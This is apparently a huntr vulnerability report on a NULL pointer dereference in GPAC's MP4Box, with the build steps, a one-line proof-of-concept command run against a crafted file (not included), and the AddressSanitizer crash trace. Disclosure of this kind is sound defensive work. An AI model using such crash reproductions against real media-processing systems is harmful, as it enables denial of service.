NULL Pointer Dereference

huntr report 21926FC2-6EB1-4E24-8A36-E60F487D0257
Reported by: cnitlrt
Source: www.huntr.dev
Date: May 18, 2023, 03:23:25
Tags: ubuntu, null pointer dereference, asan, proof of concept, memory access, security bug

EPSS: 0.002 (Low), percentile 55.8%

Description

NULL pointer dereference in gf_isom_fragment_add_sample_ex (isomedia/movie_fragments.c:2883)

Environment

No LSB modules are available.
Distributor ID:	Ubuntu
Description:	Ubuntu 20.04 LTS
Release:	20.04
Codename:	focal

Build

sudo CC=gcc CXX=g++ CFLAGS="-fsanitize=address -static-libasan" CXXFLAGS="-fsanitize=address -static-libasan" LDFLAGS="-fsanitize=address -static-libasan" ./configure && sudo make

Proof of Concept

bin/gcc/MP4Box -dash 1000 ./poc7

ASAN

[iso file] Unknown box type 0000 in parent moov
[iso file] Unknown box type 0000 in parent moov
[iso file] Unknown box type 0000 in parent moov
[iso file] Unknown box type 0000 in parent moov
[iso file] Unknown box type 0000 in parent moov
[iso file] Unknown box type 0000 in parent moov
[iso file] Unknown box type 0000 in parent minf
[iso file] Missing DataInformationBox
[iso file] Unknown box type 0000 in parent moov
[iso file] Read Box type 0000 (0x30303030) at position 11542 has size 0 but is not at root/file level. Forbidden, skipping end of parent box !
[iso file] Box "moov" (start 20) has 806 extra bytes
[iso file] Unknown top-level box type 0000
[IsoMedia] Track 1 is disabled but single track in file, considering it enabled
[Dasher] No template assigned, using $File$_dash$FS$$Number$
[iso file] Unknown box type 0000 in parent moov
[iso file] Unknown box type 0000 in parent moov
[iso file] Unknown box type 0000 in parent moov
[iso file] Unknown box type 0000 in parent moov
[iso file] Unknown box type 0000 in parent moov
[iso file] Unknown box type 0000 in parent moov
[iso file] Unknown box type 0000 in parent moov
AddressSanitizer:DEADLYSIGNAL
=================================================================
==3802899==ERROR: AddressSanitizer: SEGV on unknown address 0x000000000000 (pc 0x7fc009a6a74c bp 0x000000000000 sp 0x7fff627f5d40 T0)
==3802899==The signal is caused by a READ memory access.
==3802899==Hint: address points to the zero page.
    #0 0x7fc009a6a74b in gf_isom_fragment_add_sample_ex isomedia/movie_fragments.c:2883
    #1 0x7fc00a713f83 in mp4_mux_process_sample filters/mux_isom.c:4742
    #2 0x7fc00a759cd6 in mp4_mux_process_fragmented filters/mux_isom.c:6391
    #3 0x7fc00a759cd6 in mp4_mux_process filters/mux_isom.c:6992
    #4 0x7fc00a375c48 in gf_filter_process_task filter_core/filter.c:2894
    #5 0x7fc00a31f731 in gf_fs_thread_proc filter_core/filter_session.c:1961
    #6 0x7fc00a3378fb in gf_fs_run filter_core/filter_session.c:2263
    #7 0x7fc009b96fdb in gf_dasher_process media_tools/dash_segmenter.c:1236
    #8 0x55ec636cfcad in do_dash /home/ubuntu/gpac/applications/mp4box/mp4box.c:4825
    #9 0x55ec636cfcad in mp4box_main /home/ubuntu/gpac/applications/mp4box/mp4box.c:6236
    #10 0x7fc008eff082 in __libc_start_main ../csu/libc-start.c:308
    #11 0x55ec63561e9d in _start (/home/ubuntu/gpac/bin/gcc/MP4Box+0x1de9d)

AddressSanitizer can not provide additional info.
SUMMARY: AddressSanitizer: SEGV isomedia/movie_fragments.c:2883 in gf_isom_fragment_add_sample_ex
==3802899==ABORTING